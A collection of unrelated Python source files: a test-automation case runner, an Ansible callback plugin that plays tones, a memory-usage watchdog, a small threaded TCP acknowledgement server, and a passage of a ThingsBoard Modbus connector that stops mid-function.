sutstring +='SUT(%s):[%s]\n'%(sut,self.SUTs[sut])
self.info('connecting to %s'%(sut))
try:
thList.append( threading.Thread(target=self.Connect2Sut,args =[sut]))
thList[-1].start()
except Exception as e:
import traceback
self.info(traceback.format_exc())
print(traceback.format_exc())
raise Exception('Can NOT connected to %s'%sut)
for t in thList:
t.join()
self.InitialDone=True
#print(self.thInteraction)
def troubleshooting(self):
import threading
self.flagInteraction = True
thWebclient=threading.Thread(target=self.QuerySUTOutput,args =[])
thWebclient.start()
def Connect2Sut(self,sutname):
ses =None
sutattr = self.SUTs.get(sutname)
if sutattr["SUT"].strip() =='':
if os.name!='nt':
sutattr['SUT'] ='Session'
else:
sutattr['SUT'] ='WinSession'
classname = sutattr["SUT"]
ModuleName = __import__(classname)
ClassName = ModuleName.__getattribute__(classname)
print('connecting ... to %s'%sutname)
ses= ClassName(sutname, sutattr,logger=self.logger ,logpath = self.LogDir)
self.Session.update({sutname:ses})
print('connected to %s'%sutname)
self.info('connected to to %s'%(sutname))
return ses
def EndCase(self, force=False, killProcess=False):
if self.DebugWhenFailed ==True and self.CaseFailed==True:
return 'case failed! and it is waiting for your debug, if you do want to end this case, please try EndCase(force=True)'
elif self.flagInteraction==True and force==False:
return 'case is in troubleshooting/interaction mode, if you do want to end this case, please try EndCase(force=True)'
savefile =threading.Thread(target=self.SaveCase2File,args =[])
savefile.start()
self.bCaseEnd=True
import time
import os
#if self.thInteraction and self.thInteraction.isAlive():
# time.sleep(1)
#time.sleep(self.MoniterInterval)
for sut in self.Session.keys():
self.Session[sut].EndSession()
from common import csvfile2dict
#runcfg = csvfile2dict('./manualrun.cfg')
#dbname =runcfg.get('db')
#from Database import FetchOne, UpdateRecord
#caseinfo = runcfg.get('caseinfo')
pid = os.getpid()
#UpdateRecord(dbname, caseinfo, """status='ended-closed',end_time=%f"""%(time.time()), "status='running' and pid= %d"%(pid))
#self.logger.info('update database done!')
#self.SaveCase2File()
#if self.Sock:
#self.Sock.shutdown(socket.SHUT_RDWR)
#self.Sock.close()
import signal
try:
if killProcess:
os.kill(os.getpid(), signal.SIGTERM)#exit(0)#
pass
except:
pass
def action(self,sut='__case__', cmd='',expect='.*',timeout=1.0):
self.ActionCheck([sut, cmd,expect ,float(timeout)])
def ActionCheck(self,step=[]):
global reRetry,reNo,reNoWait,reNoAction,reCtrl,reAlt,reCtrlAlt
#for step in steps:
self.info('Start Step:sut(%s), action(%s), expect(%s) within %f'%(step[0],step[1],step[2],float(step[3])))
[sut,cmd,exp,Time]=step[:4]
[fretry,fNoAction,fNo,fNoWait]=[1,False,False,False]
mRetry=re.match(reRetry, cmd)
mCtrl= re.match(reCtrl,cmd)
mAlt = re.match(reAlt,cmd)
mCtrlAlt = re.match(reCtrlAlt,cmd)
fCtrl =False
fAlt= False
if mCtrl:
fCtrl=True
cmd = mCtrl.group(1)
if mAlt:
fAlt=True
cmd = mAlt.group(1)
if mCtrlAlt:
fCtrl=True
fAlt=True
cmd = mCtrlAlt.group(1)
if mRetry:
fretry= int(mRetry.group(1))
cmd = mRetry.group(2)
mNoAction= re.match(reNoAction,cmd)
if mNoAction:
fNoAction=True
mNoWait = re.match(reNoWait,exp)
if mNoWait:
fNoWait=True
exp=mNoWait.group(1)
mNo = re.match(reNo,exp)
if mNo:
fNo=True
exp=mNo.group(1)
s = self.Session[sut]
(ActionIsFunction,action,arg,kwarg) = s.ParseCmdInAction(cmd)
Failure=True
totalretry=fretry
while fretry>1:
fretry= fretry-1
try:
if not fNoAction:
if ActionIsFunction:
s.CallFun(action, arg, kwarg)
Failure=False
break
else:
s.SendLine(command = cmd, Ctrl=fCtrl, Alt=fAlt)
try:
response =s.Expect(exp,Time,fNoWait)
if not fNo:
Failure=False
break
except Exception as e:
if fNo:
Failure=False
break
except Exception as e:
if os.name!='nt':
pass#print ('%d/%d failed'%(totalretry-fretry,totalretry), file=sys.stdout)
else:
print ('%d/%d failed'%(totalretry-fretry,totalretry), sys.stdout)
self.info('%d/%d failed'%(totalretry-fretry,totalretry))
IgnoreExp=False
if Failure:#try last time
if not fNoAction:
if ActionIsFunction:
IgnoreExp=True
s.CallFun(action, arg, kwarg)
Failure=False
else:
s.SendLine(command = cmd, Ctrl=fCtrl, Alt=fAlt)
if IgnoreExp:
return
result=''
if fNo:
foundPattern =False
try:
result = s.Expect(exp,Time,fNoWait)
foundPattern=True
except:
pass
if foundPattern:
self.error('unexpect(%s) found within %f'% (exp, float(Time)))
raise Exception('unexpect(%s) found within %f'% (exp, float(Time)))
else:
self.info('no unexpected pattern (%s) found'%exp)
else:
result = s.Expect(exp,Time,fNoWait)
#print('Expect (%s) found!'%(exp))
#print(result)
def ParseCmdInAction(self,cmd):
IsCallFunction= True
reFunction = re.compile('\s*FUN\s*:\s*(.+?)\s*\(\s*(.*)\s*\)|\s*(.+?)\s*\(\s*(.*)\s*\)',re.IGNORECASE)
m = re.match(reFunction, cmd)
fun =cmd
arg = ""
kwarg ={}
# noinspection PyComparisonWithNone
if m != None :
# noinspection PyComparisonWithNone
if m.group(1) !=None:
fun = m.group(1)
arg = m.group(2)
else:
fun = m.group(3)
arg = m.group(4)
fun = self.__getattribute__(fun)
import inspect
inspect.getfullargspec(fun) # getargspec was removed in newer Pythons; the result was never used here
try:
parsestr= "self.GetFunArgs(%s)"%((arg))
eval(parsestr)
except Exception as e:
arg.strip()
if re.search(',',arg):
self.argvs =arg.split(',')
elif len(arg.strip())==0:
self.argvs =[]
else:
self.argvs =[self.argvs]
arg =self.argvs
kwarg = self.kwargvs
else:
IsCallFunction = False
fun = cmd
return (IsCallFunction,fun,arg,kwarg)
def GetFunArgs(self,*argvs, **kwargs):
self.argvs=[]
self.kwargvs={}
#re-assign for self.argvs and self.kwargvs
for arg in argvs:
self.argvs.append(arg)
for k in kwargs.keys():
self.kwargvs.update({k:kwargs[k]})
def CallFun(self,functionName,args=[], kwargs={}):
self.fActionInProgress=True
resp = functionName(*args, **kwargs)
#self.info(resp)
self.fActionInProgress=False
# noinspection PyComparisonWithNone
if resp ==None:
return 'Done'
else:
return resp
def pp(self,varname):
return repr(self.__getattribute__(varname)).replace('\\\\n','\n').replace('\\\\r','\r')
def set(self,varname,value):
return self.__setattr__(varname, value)
def SetBreakPoint(self,segment,index):
self.info('SetBreakPoint("%s","%s"'%(segment,str(index)))
segment= segment.upper()
if segment=='SETUP':
segment= 0
elif segment=='RUN':
segment= 1
elif segment=='TEARDOWN':
segment=2
else:
msg= 'segment should be one of [SETUP,RUN, TEARDOWN]'
self.error(msg)
return msg
if index<1:
index =1
self.breakpoint[segment].append(index)
self.breakpoint[segment].sort()
def str2indexSegment(self,segmentstr):
segment= segmentstr.upper()
if segment=='SETUP':
segment= 0
elif segment=='RUN':
segment= 1
elif segment=='TEARDOWN':
segment=2
else:
raise
return segment
def BreakPointCheck(self,segment,index):
segment= segment.upper()
segment =self.str2indexSegment(segment)
if len(self.breakpoint[segment])>0:
self.info('BreakPointCheck("%s","%s")'%(segment,index))
for i in sorted(self.breakpoint[segment]):
if index==i:
return True
return False
def getIntSegIndex(self,strSegIndex):
global reSegementIndex #=re.compile ('\s*(SETUP|RUN|TEARDOWN)\s*.\s*(\d+)',re.I)
m = re.match(reSegementIndex, strSegIndex)
seg= self.str2indexSegment(m.group(1).upper())
index= int(m.group(2))
if index==-1:
index = len(self.Steps[seg])+1
return seg,index
def cpReset(self):
self.cp = [0,1]
def cpSet(self,seg, index):
self.cp =[seg, index]
strSeg=['setup','run','teardown']
return '%s.%d'%(strSeg[seg],index)
def getCP(self):
strSeg=['setup','run','teardown']
if self.cp[0]>2:
seg, index = self.getIntSegIndex('teardown.-1')
return 'teardown.%d'%(index+1)
return '%s.%d'%(strSeg[self.cp[0]],self.cp[1])
def cpNext(self):
l =len(self.Steps[self.cp[0]])
self.cp[1]+=1
if self.cp[1]>l:
self.cp[1]=1
self.cp[0]+=1
def RunCase(self,mode,startindex,endindex):
self.info('case %s.RunCase(%s,%s,%s)'%(self.Name,mode ,startindex,endindex))
startSeg, startIndex= self.getIntSegIndex(startindex)
endSeg, endIndex= self.getIntSegIndex(endindex)
mode =mode.lower()
self.info('step')
self.cpSet(startSeg, startIndex)
seg=['setup','run','teardown']
while self.IndexInRange(self.getCP(), startindex, endindex):
if self.BreakPointCheck(seg[self.cp[0]], self.cp[1]):
self.flagInteraction=True
while self.flagInteraction:
time.sleep(0.5)
skip=False
if mode =='full':
pass
elif mode =='setupteardown' and self.cp[0]==1:
skip=True
elif mode =='setuprun' and self.cp[0]==2:
skip=True
elif mode =='runteardown' and self.cp[0]==0:
skip=True
elif mode =='setup' and self.cp[0]!=0:
skip=True
elif mode =='run' and self.cp[0]!=1:
skip=True
elif mode =='teardown' and self.cp[0]!=2:
skip=True
if not skip:
try:
try:
step = self.Steps[self.cp[0]][self.cp[1]-1]
except Exception as e:
break
self.fRunning=True
print('#'*80)
print('#step (%s.%d)'%(seg[self.cp[0]],int(self.cp[1])))
print('#SUT(%s), Action(%s), Exp(%s), Within (%f)'%(step[0],step[1],step[2],float(step[3])))
self.info('#'*80)
self.info('#step (%s.%d)'%(seg[self.cp[0]],int(self.cp[1])))
self.info('#SUT(%s), Action(%s), Exp(%s), Within (%f)'%(step[0],step[1],step[2],float(step[3])))
if len(step)>4:
print('#%s'%(step[4]))
self.info('#%s'%(step[4]))
print('#'*80)
self.info('#'*80)
self.AddCmd2RecordReplay(step)
self.ActionCheck(step)
except Exception as e:
self.error(DumpStack(e))
if not self.DebugWhenFailed:
self.bCaseEnd=True
import traceback
msg = traceback.format_exc()
print(msg)
raise Exception(msg)
self.fRunning=False
if not self.flagInteraction:
self.bCaseEnd=True
self.cpNext()
self.info('-'*80)
def IndexInRange(self,testIndex,startindex='setup.1',endindex='teardown.-1'):
MAX_ACTION= 65535
startSeg, startIndex= self.getIntSegIndex(startindex)
endSeg, endIndex= self.getIntSegIndex(endindex)
testSeg, testIndex=self.getIntSegIndex(testIndex)
start = startSeg*MAX_ACTION+startIndex
end = endSeg*MAX_ACTION+endIndex
test = testSeg*MAX_ACTION+testIndex
if test>=start and test<=end:
return True
else:
return False
def IsAlive(self):
if self.bCaseEnd:
return False
else:
return True
def CheckCaseResult(self):
if not self.ErrorMessage:
self.ErrorMessage=[]
FailFlag=False
for sesname in self.Session.keys():
ses=self.Session[sesname]
FailFlag+=ses.FailFlag
if ses.ErrorMessage:
print(sesname, ses.ErrorMessage)
self.ErrorMessage.append(['SUT: (%s) ErrorMessage is below:'%(sesname)])
if isinstance(ses.ErrorMessage, str):
self.ErrorMessage.append(ses.ErrorMessage)
else:
print(sesname, ses.ErrorMessage)
for i in ses.ErrorMessage:
self.ErrorMessage.append(i)
if FailFlag:
resultfilename ='case_result.csv'
self.Write2Csv(self.ErrorMessage,resultfilename)
self.error('case failed ,check detail in file:%s/%s'%(self.LogDir,resultfilename))
raise Exception('case failed ,check detail in file:%s'%resultfilename)
def Write2Csv(self, msgList,CsvFileName=None, path=None):
'''
msgList: if msgList is a list, each element will be written to its own cell;
if msgList is a string, all chars will be written to a single cell
CsvFileName: a file name, default is None, which means to create a SUT_NAME_.csv file and write msg to it, similar to SUT_NAME.log
'''
if not path:
import os
path = self.LogDir
from common import array2csvfile
csvfile = '%s/result.csv'%path
arrayToBeWritten = msgList
if CsvFileName:
if CsvFileName.find('\\')!=-1 or CsvFileName.find('/')!=-1:
csvfile = CsvFileName
else:
csvfile = os.path.sep.join([path,CsvFileName])
array2csvfile(arrayToBeWritten, csvfile)
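# Construction sketch (everything below is hypothetical; Connect2Sut() imports
# the real Session/WinSession classes dynamically, so this needs live SUTs):
# suts = {'dut1': {'SUT': 'Session', 'ip': '10.0.0.1'}}
# steps = [[], [['dut1', 'uname -a', 'Linux', 5]], []]
# case = Case('SmokeTest', suts, steps=steps, mode='FULL')
# case.RunCase('full', 'setup.1', 'teardown.-1')
# case.EndCase(force=True)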
|
tones.py | # (c) 2012, Michael DeHaan, <michael.dehaan@gmail.com>
# (c) 2017 Ansible Project
# (c) 2019 Jeff Geerling
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: tones
type: notification
requirements:
- whitelisting in configuration
- the SoX command line program ('brew install sox' on macOS)
short_description: play a note using software synthesizer
version_added: N/A
description:
- This plugin will use the SoX program to play notes for tasks.
'''
import distutils.spawn
import platform
import subprocess
import os
import threading
import time
from ansible.plugins.callback import CallbackBase
class CallbackModule(CallbackBase):
"""
makes Ansible much more exciting.
"""
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'notification'
CALLBACK_NAME = 'tones'
CALLBACK_NEEDS_WHITELIST = True
def __init__(self):
super(CallbackModule, self).__init__()
self.synthesizer = distutils.spawn.find_executable('play')
# the plugin disables itself if 'play' is not present
# ansible will not call any callback if disabled is set to True
if not self.synthesizer:
self.disabled = True
self._display.warning("Unable to find 'play' executable, plugin %s disabled" % os.path.basename(__file__))
def tone(self, tone, length, delay):
cmd = [self.synthesizer]
if tone:
time.sleep(delay)
cmd.extend(('-q', '-n', 'synth', length, 'sin', tone))
subprocess.call(cmd)
def playbook_on_task_start(self, name, is_conditional):
# define some defaults
length = '0.75'
delay = 0.5
notes = {
'G5': '783.99',
'A5': '880.00',
'F5': '698.46',
'F4': '349.23',
'C5': '523.25'
}
if name == 'C5':
length = '1.25'
# play the tone if it exists
if name in notes.keys():
thread = threading.Thread(target=self.tone, args=(notes[name], length, delay))
thread.daemon = True
thread.start()
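# To use this callback it must be whitelisted; a minimal ansible.cfg sketch
# (section/key per standard Ansible callback configuration):
# [defaults]
# callback_whitelist = tones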
|
profiling.py |
import gc
import json
import logging
import os
import sys
import threading
import time
import objgraph
import psutil
def start_mem_check_thread(threshold=1024 * 1024 * 1024,
gc=False,
size_range=None,
interval=1
):
"""
Start a thread in background and in daemon mode, to watch memory usage.
If memory this process is using beyond `threshold`, a memory usage profile
is made and is written to root logger. And process is aborted.
`threshold`: maximum memory a process can use before abort.
`gc`: whether to run gc every time before checking memory usage.
`size_range`: in tuple, dump only object of size in this range.
`interval`: memory check interval.
"""
options = {
'threshold': threshold,
'gc': gc,
'size_range': size_range,
'interval': interval,
}
th = threading.Thread(target=mem_check, args=(options,))
th.daemon = True
th.start()
return th
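# Minimal usage sketch (threshold and interval values are illustrative):
# th = start_mem_check_thread(threshold=2 * 1024 ** 3, gc=True, interval=5)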
def mem_check(opts):
while True:
if opts['gc']:
try:
gc.collect()
except Exception as e:
logging.exception(repr(e) + ' while gc.collect()')
try:
rss = psutil.Process(os.getpid()).memory_info().rss
logging.info('current memory used: {rss}'.format(rss=rss))
if rss > opts['threshold']:
memory_dump(opts)
os.abort()
except Exception as e:
logging.exception(repr(e) + ' while checking memory usage')
finally:
time.sleep(opts['interval'])
def memory_dump(opts):
try:
_memory_dump(opts)
except Exception as e:
logging.exception(repr(e))
def _memory_dump(opts):
for typ, n in objgraph.most_common_types():
logging.info('{typ:30} {n:>10}'.format(typ=typ, n=n))
objects = []
rng = opts['size_range']
summ = {
'max_refsize': {
'size': 0,
},
}
for obj in gc.get_objects():
if not hasattr(obj, '__class__'):
continue
size = sys.getsizeof(obj, 0)
if rng is not None:
if not (rng[0] <= size < rng[1]):
continue
i = id(obj)
# referrers = [id(o)
# for o in gc.get_referrers(obj)
# if hasattr(o, '__class__')]
referents = [(id(o), _get_class(o), sys.getsizeof(o, 0))
for o in gc.get_referents(obj)
# if hasattr(o, '__class__')
]
refsize = sum([x[2] for x in referents])
cls = _get_class(obj)
data = [
i,
cls,
size, # object size
refsize, # size of all direct referents
referents, # referents
]
objects.append(data)
if summ['max_refsize']['size'] < refsize:
summ['max_refsize'] = {
'size': refsize,
'object': data,
}
for o in objects:
logging.info('memory-dump: ' + json.dumps(o))
logging.info('memory-dump summary: ' + json.dumps(summ))
def _get_class(obj):
if hasattr(obj, '__class__') and hasattr(obj.__class__, '__name__'):
cls = obj.__class__.__name__
else:
cls = str(type(obj))
return cls
if __name__ == "__main__":
logging.basicConfig(level='DEBUG',
format='%(asctime)s,%(name)s,%(levelname)s %(message)s',
datefmt='%H:%M:%S'
)
rss = psutil.Process(os.getpid()).memory_info().rss
logging.info('initial mem:' + repr(rss))
start_mem_check_thread(threshold=rss + 1024 * 100,
interval=0.1)
a = []
logging.info('a: ' + str(id(a)))
while True:
a.append(str(int(time.time() * 1000)) * 100)
time.sleep(0.001)
|
tcpserver.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import threading
bind_ip = '0.0.0.0'
port = 80
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, port))
server.listen(5)
print("[*] Server listening on {}:{}".format(bind_ip, port))
def handle(client_socket):
request = client_socket.recv(1024)
print("[*] Recieved {} ".format(request))
client_socket.send("ACK!")
client_socket.close()
while True:
client, addr = server.accept()
print("[*] Accepted connection from {}:{}".format(addr[0], addr[1]))
handler = threading.Thread(target=handle, args=(client,))
handler.start()
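# Throwaway client for manual testing (sketch; assumes the server runs locally):
# import socket
# c = socket.create_connection(('127.0.0.1', 80))
# c.send(b'hello')
# print(c.recv(4096))
# c.close()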
|
modbus_connector.py | # Copyright 2021. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
from queue import Queue
from random import choice
from string import ascii_lowercase
from thingsboard_gateway.tb_utility.tb_loader import TBModuleLoader
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
# Try to import the pymodbus library, installing it first if necessary
try:
from pymodbus.constants import Defaults
except ImportError:
print("Modbus library not found - installing...")
TBUtility.install_package("pymodbus", ">=2.3.0")
TBUtility.install_package('pyserial')
from pymodbus.constants import Defaults
from pymodbus.client.sync import ModbusTcpClient, ModbusUdpClient, ModbusSerialClient, ModbusRtuFramer, \
ModbusSocketFramer
from pymodbus.bit_write_message import WriteSingleCoilResponse, WriteMultipleCoilsResponse
from pymodbus.register_write_message import WriteMultipleRegistersResponse, WriteSingleRegisterResponse
from pymodbus.register_read_message import ReadRegistersResponseBase
from pymodbus.bit_read_message import ReadBitsResponseBase
from pymodbus.exceptions import ConnectionException
from thingsboard_gateway.connectors.connector import Connector, log
from thingsboard_gateway.connectors.modbus.constants import *
from thingsboard_gateway.connectors.modbus.bytes_modbus_uplink_converter import BytesModbusUplinkConverter
from thingsboard_gateway.connectors.modbus.bytes_modbus_downlink_converter import BytesModbusDownlinkConverter
CONVERTED_DATA_SECTIONS = [ATTRIBUTES_PARAMETER, TELEMETRY_PARAMETER]
class ModbusConnector(Connector, threading.Thread):
def __init__(self, gateway, config, connector_type):
self.statistics = {STATISTIC_MESSAGE_RECEIVED_PARAMETER: 0,
STATISTIC_MESSAGE_SENT_PARAMETER: 0}
super().__init__()
self.__gateway = gateway
self._connector_type = connector_type
self.__config = config.get(CONFIG_SERVER_SECTION_PARAMETER)
self.__previous_master_config = dict()
self.__current_master, self.__available_functions = self.__configure_master()
self.__default_config_parameters = [HOST_PARAMETER,
PORT_PARAMETER,
BAUDRATE_PARAMETER,
TIMEOUT_PARAMETER,
METHOD_PARAMETER,
STOPBITS_PARAMETER,
BYTESIZE_PARAMETER,
PARITY_PARAMETER,
STRICT_PARAMETER,
TYPE_PARAMETER]
self.__byte_order = self.__config.get(BYTE_ORDER_PARAMETER)
self.__word_order = self.__config.get(WORD_ORDER_PARAMETER)
self.__devices = {}
self.setName(self.__config.get("name", 'Modbus Default ' + ''.join(choice(ascii_lowercase) for _ in range(5))))
self.__load_converters()
self.__connected = False
self.__stopped = False
self.daemon = True
self.__data_to_convert_queue = Queue()
def is_connected(self):
return self.__connected
def open(self):
self.__stopped = False
self.start()
log.info("Starting Modbus connector")
def run(self):
self.__connected = True
while True:
time.sleep(.01)
self.__process_devices()
if not self.__data_to_convert_queue.empty():
for _ in range(self.__data_to_convert_queue.qsize()):
thread = threading.Thread(target=self.__convert_and_save_data, args=(self.__data_to_convert_queue,),
daemon=True)
thread.start()
if self.__stopped:
break
def __convert_and_save_data(self, queue):
device, current_device_config, config, device_responses = queue.get()
converted_data = {}
try:
converted_data = self.__devices[device][UPLINK_PREFIX + CONVERTER_PARAMETER].convert(
config=config,
data=device_responses)
except Exception as e:
log.error(e)
return
to_send = {DEVICE_NAME_PARAMETER: converted_data[DEVICE_NAME_PARAMETER],
DEVICE_TYPE_PARAMETER: converted_data[DEVICE_TYPE_PARAMETER],
TELEMETRY_PARAMETER: [],
ATTRIBUTES_PARAMETER: []
}
if current_device_config.get(SEND_DATA_ONLY_ON_CHANGE_PARAMETER):
self.statistics[STATISTIC_MESSAGE_RECEIVED_PARAMETER] += 1
for converted_data_section in CONVERTED_DATA_SECTIONS:
for current_section_dict in converted_data[converted_data_section]:
for key, value in current_section_dict.items():
if self.__devices[device][LAST_PREFIX + converted_data_section].get(key) is None or \
self.__devices[device][LAST_PREFIX + converted_data_section][key] != value:
self.__devices[device][LAST_PREFIX + converted_data_section][key] = value
to_send[converted_data_section].append({key: value})
elif converted_data and current_device_config.get(SEND_DATA_ONLY_ON_CHANGE_PARAMETER) is None or \
not current_device_config.get(SEND_DATA_ONLY_ON_CHANGE_PARAMETER):
self.statistics[STATISTIC_MESSAGE_RECEIVED_PARAMETER] += 1
for converted_data_section in CONVERTED_DATA_SECTIONS:
self.__devices[device][LAST_PREFIX + converted_data_section] = converted_data[
converted_data_section]
to_send[converted_data_section] = converted_data[converted_data_section]
if to_send.get(ATTRIBUTES_PARAMETER) or to_send.get(TELEMETRY_PARAMETER):
self.__gateway.send_to_storage(self.get_name(), to_send)
self.statistics[STATISTIC_MESSAGE_SENT_PARAMETER] += 1
def __load_converters(self):
try:
for device in self.__config[CONFIG_DEVICES_SECTION_PARAMETER]:
if self.__config.get(UPLINK_PREFIX + CONVERTER_PARAMETER) is not None:
converter = TBModuleLoader.import_module(self._connector_type,
self.__config[UPLINK_PREFIX + CONVERTER_PARAMETER])(device)
else:
converter = BytesModbusUplinkConverter(device)
if self.__config.get(DOWNLINK_PREFIX + CONVERTER_PARAMETER) is not None:
downlink_converter = TBModuleLoader.import_module(self._connector_type, self.__config[
DOWNLINK_PREFIX + CONVERTER_PARAMETER])(device)
else:
downlink_converter = BytesModbusDownlinkConverter(device)
if device.get(DEVICE_NAME_PARAMETER) not in self.__gateway.get_devices():
self.__gateway.add_device(device.get(DEVICE_NAME_PARAMETER), {CONNECTOR_PARAMETER: self},
device_type=device.get(DEVICE_TYPE_PARAMETER))
self.__devices[device[DEVICE_NAME_PARAMETER]] = {CONFIG_SECTION_PARAMETER: device,
UPLINK_PREFIX + CONVERTER_PARAMETER: converter,
DOWNLINK_PREFIX + CONVERTER_PARAMETER: downlink_converter,
NEXT_PREFIX + ATTRIBUTES_PARAMETER + CHECK_POSTFIX: 0,
NEXT_PREFIX + TIMESERIES_PARAMETER + CHECK_POSTFIX: 0,
TELEMETRY_PARAMETER: {},
ATTRIBUTES_PARAMETER: {},
LAST_PREFIX + TELEMETRY_PARAMETER: {},
LAST_PREFIX + ATTRIBUTES_PARAMETER: {},
CONNECTION_ATTEMPT_PARAMETER: 0
}
except Exception as e:
log.exception(e)
def close(self):
self.__stopped = True
self.__stop_connections_to_masters()
log.info('%s has been stopped.', self.get_name())
def get_name(self):
return self.name
def __process_devices(self):
for device in self.__devices:
current_time = time.time()
device_responses = {TIMESERIES_PARAMETER: {},
ATTRIBUTES_PARAMETER: {},
}
current_device_config = {}
try:
for config_section in device_responses:
if self.__devices[device][CONFIG_SECTION_PARAMETER].get(config_section) is not None:
current_device_config = self.__devices[device][CONFIG_SECTION_PARAMETER]
unit_id = current_device_config[UNIT_ID_PARAMETER]
if self.__devices[device][NEXT_PREFIX + config_section + CHECK_POSTFIX] < current_time:
self.__connect_to_current_master(device)
if not self.__current_master.is_socket_open() or not len(
current_device_config[config_section]):
continue
# Reading data from device
for interested_data in range(len(current_device_config[config_section])):
current_data = current_device_config[config_section][interested_data]
current_data[DEVICE_NAME_PARAMETER] = device
input_data = self.__function_to_device(current_data, unit_id)
device_responses[config_section][current_data[TAG_PARAMETER]] = {
"data_sent": current_data,
"input_data": input_data}
log.debug("Checking %s for device %s", config_section, device)
self.__devices[device][NEXT_PREFIX + config_section + CHECK_POSTFIX] = current_time + \
current_device_config[
config_section + POLL_PERIOD_POSTFIX] / 1000
log.debug('Device response: %s', device_responses)
if device_responses.get('timeseries') or device_responses.get('attributes'):
self.__data_to_convert_queue.put((device, current_device_config, {
**current_device_config,
BYTE_ORDER_PARAMETER: current_device_config.get(BYTE_ORDER_PARAMETER,
self.__byte_order),
WORD_ORDER_PARAMETER: current_device_config.get(WORD_ORDER_PARAMETER,
self.__word_order)
}, device_responses))
except ConnectionException:
time.sleep(5)
log.error("Connection lost! Reconnecting...")
except Exception as e:
log.exception(e)
def on_attributes_update(self, content):
try:
for attribute_updates_command_config in \
self.__devices[content[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER]["attributeUpdates"]:
for attribute_updated in content[DATA_PARAMETER]:
if attribute_updates_command_config[TAG_PARAMETER] == attribute_updated:
to_process = {
DEVICE_SECTION_PARAMETER: content[DEVICE_SECTION_PARAMETER],
DATA_PARAMETER: {
RPC_METHOD_PARAMETER: attribute_updated,
RPC_PARAMS_PARAMETER: content[DATA_PARAMETER][attribute_updated]
}
}
self.__process_rpc_request(to_process, attribute_updates_command_config)
except Exception as e:
log.exception(e)
def __connect_to_current_master(self, device=None):
connect_attempt_count = 5
connect_attempt_time_ms = 100
wait_after_failed_attempts_ms = 300000
# if device is None:
# device = list(self.__devices.keys())[0]
if self.__devices[device].get(MASTER_PARAMETER) is None:
self.__devices[device][MASTER_PARAMETER], self.__devices[device][
AVAILABLE_FUNCTIONS_PARAMETER] = self.__configure_master(
self.__devices[device][CONFIG_SECTION_PARAMETER])
if self.__devices[device][MASTER_PARAMETER] != self.__current_master:
self.__current_master = self.__devices[device][MASTER_PARAMETER]
self.__available_functions = self.__devices[device][AVAILABLE_FUNCTIONS_PARAMETER]
connect_attempt_count = self.__devices[device][CONFIG_SECTION_PARAMETER].get(CONNECT_ATTEMPT_COUNT_PARAMETER,
connect_attempt_count)
if connect_attempt_count < 1:
connect_attempt_count = 1
connect_attempt_time_ms = self.__devices[device][CONFIG_SECTION_PARAMETER].get(
CONNECT_ATTEMPT_TIME_MS_PARAMETER, connect_attempt_time_ms)
if connect_attempt_time_ms < 500:
connect_attempt_time_ms = 500
wait_after_failed_attempts_ms = self.__devices[device][CONFIG_SECTION_PARAMETER].get(
WAIT_AFTER_FAILED_ATTEMPTS_MS_PARAMETER, wait_after_failed_attempts_ms)
if wait_after_failed_attempts_ms < 1000:
wait_after_failed_attempts_ms = 1000
current_time = time.time() * 1000
if not self.__current_master.is_socket_open():
if self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] >= connect_attempt_count and \
current_time - self.__devices[device][
LAST_CONNECTION_ATTEMPT_TIME_PARAMETER] >= wait_after_failed_attempts_ms:
self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] = 0
while not self.__current_master.is_socket_open() \
and self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] < connect_attempt_count \
and current_time - self.__devices[device].get(LAST_CONNECTION_ATTEMPT_TIME_PARAMETER,
0) >= connect_attempt_time_ms:
self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] = self.__devices[device][
CONNECTION_ATTEMPT_PARAMETER] + 1
self.__devices[device][LAST_CONNECTION_ATTEMPT_TIME_PARAMETER] = current_time
log.debug("Modbus trying connect to %s", device)
self.__current_master.connect()
if self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] == connect_attempt_count:
log.warn("Maximum attempt count (%i) for device \"%s\" - encountered.", connect_attempt_count,
device)
# time.sleep(connect_attempt_time_ms / 1000)
# if not self.__current_master.is_socket_open():
if self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] >= 0 and self.__current_master.is_socket_open():
self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] = 0
self.__devices[device][LAST_CONNECTION_ATTEMPT_TIME_PARAMETER] = current_time
log.debug("Modbus connected to device %s.", device)
def __configure_master(self, config=None):
current_config = self.__config if config is None else config
master_config = dict()
master_config["host"] = current_config[HOST_PARAMETER] if current_config.get(
HOST_PARAMETER) is not None else self.__config.get(HOST_PARAMETER, "localhost")
try:
master_config["port"] = int(current_config[PORT_PARAMETER]) if current_config.get(
PORT_PARAMETER) is not None else self.__config.get(int(PORT_PARAMETER), 502)
except ValueError:
master_config["port"] = current_config[PORT_PARAMETER] if current_config.get(
PORT_PARAMETER) is not None else self.__config.get(PORT_PARAMETER, 502)
master_config["baudrate"] = current_config[BAUDRATE_PARAMETER] if current_config.get(
BAUDRATE_PARAMETER) is not None else self.__config.get(BAUDRATE_PARAMETER, 19200)
master_config["timeout"] = current_config[TIMEOUT_PARAMETER] if current_config.get(
TIMEOUT_PARAMETER) is not None else self.__config.get(TIMEOUT_PARAMETER, 35)
master_config["method"] = current_config[METHOD_PARAMETER] if current_config.get(
METHOD_PARAMETER) is not None else self.__config.get(METHOD_PARAMETER, "rtu")
master_config["stopbits"] = current_config[STOPBITS_PARAMETER] if current_config.get(
STOPBITS_PARAMETER) is not None else self.__config.get(STOPBITS_PARAMETER, Defaults.Stopbits)
